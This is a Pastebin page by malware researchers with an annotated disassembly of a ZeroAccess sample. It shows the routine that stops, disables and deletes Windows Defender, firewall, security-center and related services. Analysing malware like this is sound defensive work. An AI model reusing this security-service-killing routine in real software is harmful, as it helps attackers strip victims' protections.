API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie! ZeroAccess: killing processes PoC

MalwareMustDie
Feb 6th, 2013
1,513
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.83 KB | None | 0 0
raw download clone embed print report
  1. // #MalwareMustDie! Case contants.exe ZeroAccess RECYCLER
  2. // Case: http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html
  3. // In the .text PE section found the operation
  4. // to close all processes of :
  5. // MsMpSvc, windefen, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe
  6. // @unixfreaxjp /malware]$ date | Wed Feb 6 15:53:41 JST 2013
  7.  
  8. // usage of DisableThreadLibraryCalls :
  9. // A function lets a DLL disable the DLL_THREAD_ATTACH and DLL_THREAD_DETACH notification calls.
  10.  
  11. 0x4017FB push [ebp+hLibModule] ; hLibModule
  12. 0x4017FE call ds:DisableThreadLibraryCalls
  13. 0x401804 call sub_4016D1
  14. 0x401809 test eax, eax
  15. 0x40180B jz short loc_401832
  16.  
  17. // Opening keyroot
  18.  
  19. 0x402659 call ds:ZwOpenKey
  20. 0x40265F test eax, eax
  21. 0x402661 jl short loc_40267A
  22. 0x402663 push offset asc_41D0DC ; " \""
  23. 0x402668 push [ebp+hSCObject]
  24. 0x40266B call ds:ZwDeleteValueKey
  25. 0x402671 push [ebp+hSCObject]
  26. 0x402674 call ds:ZwClose
  27.  
  28. // Using the OpenSCManagerW
  29.  
  30. 0x40267A loc_40267A: ; CODE XREF: sub_402634+2Dj
  31. 0x40267A push 0F003Fh ; dwDesiredAccess
  32. 0x40267F push 0 ; lpDatabaseName
  33. 0x402681 push 0 ; lpMachineName
  34. 0x402683 call ds:OpenSCManagerW ; Establish a connection to the service
  35. ; control manager on the specified computer
  36. ; and opens the specified database
  37. 0x402689 mov [ebp+hSCObject], eax
  38. 0x40268C test eax, eax
  39. 0x40268E jz loc_40274B
  40. 0x402694 push ebx
  41. 0x402695 push esi
  42. 0x402696 push edi
  43.  
  44. // opening service "MsMpSvc"
  45.  
  46. 0x402697 mov edi, ds:OpenServiceW
  47. 0x40269D mov ebx, 0F01FFh
  48. 0x4026A2 push ebx ; dwDesiredAccess
  49. 0x4026A3 push offset ServiceName ; "MsMpSvc"
  50. 0x4026A8 push eax ; hSCManager
  51. 0x4026A9 call edi ; OpenServiceW
  52. 0x4026AB test eax, eax
  53. 0x4026AD jz short loc_4026B6
  54. 0x4026AF mov esi, eax
  55. 0x4026B1 call sub_4024E2
  56.  
  57. // opening service "windefen"
  58.  
  59. 0x4026B6 loc_4026B6: ; CODE XREF: sub_402634+79j
  60. 0x4026B6 push ebx ; dwDesiredAccess
  61. 0x4026B7 push offset aWindefend ; "windefend"
  62. 0x4026BC push [ebp+hSCObject] ; hSCManager
  63. 0x4026BF call edi ; OpenServiceW
  64. 0x4026C1 test eax, eax
  65. 0x4026C3 jz short loc_4026CC
  66. 0x4026C5 mov esi, eax
  67. 0x4026C7 call sub_4024E2
  68.  
  69. // opening service "SharedAccess"
  70.  
  71. 0x4026CC loc_4026CC: ; CODE XREF: sub_402634+8Fj
  72. 0x4026CC push ebx ; dwDesiredAccess
  73. 0x4026CD push offset aSharedaccess ; "SharedAccess"
  74. 0x4026D2 push [ebp+hSCObject] ; hSCManager
  75. 0x4026D5 call edi ; OpenServiceW
  76. 0x4026D7 test eax, eax
  77. 0x4026D9 jz short loc_4026E2
  78. 0x4026DB mov esi, eax
  79. 0x4026DD call sub_4024E2
  80. 0x4026E2
  81.  
  82. // opening service "iphlpsvc"
  83.  
  84. 0x4026E2 loc_4026E2: ; CODE XREF: sub_402634+A5j
  85. 0x4026E2 push ebx ; dwDesiredAccess
  86. 0x4026E3 push offset aIphlpsvc ; "iphlpsvc"
  87. 0x4026E8 push [ebp+hSCObject] ; hSCManager
  88. 0x4026EB call edi ; OpenServiceW
  89. 0x4026ED test eax, eax
  90. 0x4026EF jz short loc_4026F8
  91. 0x4026F1 mov esi, eax
  92. 0x4026F3 call sub_4024E2
  93. 0x4026F8
  94.  
  95. // opening service "wscsvc"
  96.  
  97. 0x4026F8 loc_4026F8: ; CODE XREF: sub_402634+BBj
  98. 0x4026F8 push ebx ; dwDesiredAccess
  99. 0x4026F9 push offset aWscsvc ; "wscsvc"
  100. 0x4026FE push [ebp+hSCObject] ; hSCManager
  101. 0x402701 call edi ; OpenServiceW
  102. 0x402703 test eax, eax
  103. 0x402705 jz short loc_40270E
  104. 0x402707 mov esi, eax
  105. 0x402709 call sub_4024E2
  106. 0x40270E
  107.  
  108. // opening service "mpssvc"
  109.  
  110. 0x40270E loc_40270E: ; CODE XREF: sub_402634+D1j
  111. 0x40270E push ebx ; dwDesiredAccess
  112. 0x40270F push offset aMpssvc ; "mpssvc"
  113. 0x402714 push [ebp+hSCObject] ; hSCManager
  114. 0x402717 call edi ; OpenServiceW
  115. 0x402719 test eax, eax
  116. 0x40271B jz short loc_402724
  117. 0x40271D mov esi, eax
  118. 0x40271F call sub_4024E2
  119. 0x402724
  120.  
  121. // opening service "bfe"
  122.  
  123. 0x402724 loc_402724: ; CODE XREF: sub_402634+E7j
  124. 0x402724 push ebx ; dwDesiredAccess
  125. 0x402725 push offset aBfe ; "bfe"
  126. 0x40272A push [ebp+hSCObject] ; hSCManager
  127. 0x40272D call edi ; OpenServiceW
  128. 0x40272F test eax, eax
  129. 0x402731 jz short loc_40273A
  130. 0x402733 mov esi, eax
  131. 0x402735 call sub_4024E2
  132. 0x40273A
  133.  
  134. // Close them handles..
  135.  
  136. 0x40273A loc_40273A: ; CODE XREF: sub_402634+FDj
  137. 0x40273A push [ebp+hSCObject] ; hSCObject
  138. 0x40273D call ds:CloseServiceHandle
  139. 0x402743 call sub_402593
  140. 0x402748 pop edi
  141. 0x402749 pop esi
  142. 0x40274A pop ebx
  143.  
  144. // Checking those services...
  145.  
  146. 0x4024E2 sub_4024E2 proc near ;
  147. 0x4024E2
  148. 0x4024E2 ServiceStatus = _SERVICE_STATUS ptr -1Ch
  149. 0x4024E2
  150. 0x4024E2 sub esp, 1Ch
  151. 0x4024E5 push edi
  152. 0x4024E6 push 4
  153. 0x4024E8 pop edi
  154. 0x4024E9
  155.  
  156. // preparations...
  157.  
  158. 0x4024E9 loc_4024E9: ;
  159. 0x4024E9 lea eax, [esp+20h+ServiceStatus]
  160. 0x4024ED push eax ; lpServiceStatus
  161. 0x4024EE push 1 ; dwControl
  162. 0x4024F0 push esi ; hService
  163. 0x4024F1 call ds:ControlService ; <==========To control code to a Win32 service
  164. 0x4024F7 test eax, eax
  165. 0x4024F9 jnz short loc_402516
  166. 0x4024FB call ds:GetLastError
  167. 0x402501 cmp eax, 41Bh
  168. 0x402506 jnz short loc_402516
  169. 0x402508 push 3E8h ; dwMilliseconds
  170. 0x40250D call ds:Sleep
  171. 0x402513 dec edi
  172. 0x402514 jnz short loc_4024E9
  173. 0x402516
  174. 0x402516 loc_402516:
  175. 0x402516 xor eax, eax
  176. 0x402518 push eax ; lpDisplayName
  177. 0x402519 push eax ; lpPassword
  178. 0x40251A push eax ; lpServiceStartName
  179. 0x40251B push eax ; lpDependencies
  180. 0x40251C push eax ; lpdwTagId
  181. 0x40251D push eax ; lpLoadOrderGroup
  182. 0x40251E push eax ; lpBinaryPathName
  183. 0x40251F push eax ; dwErrorControl
  184. 0x402520 push 4 ; dwStartType
  185. 0x402522 push 20h ; dwServiceType
  186. 0x402524 push esi ; hService
  187.  
  188. // stop it all....
  189.  
  190. 0x402525 call ds:ChangeServiceConfigW <=== triger to change status service..
  191. 0x40252B push esi ; <========value of hService
  192. 0x40252C call ds:DeleteService
  193. 0x402532 push esi ; <=== value of hSCObject
  194. 0x402533 call ds:CloseServiceHandle
  195. 0x402539 pop edi
  196. 0x40253A add esp, 1Ch
  197. 0x40253D retn
  198. 0x40253D sub_4024E2 endp
  199.  
  200. ---
  201. #MalwareMustDie
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!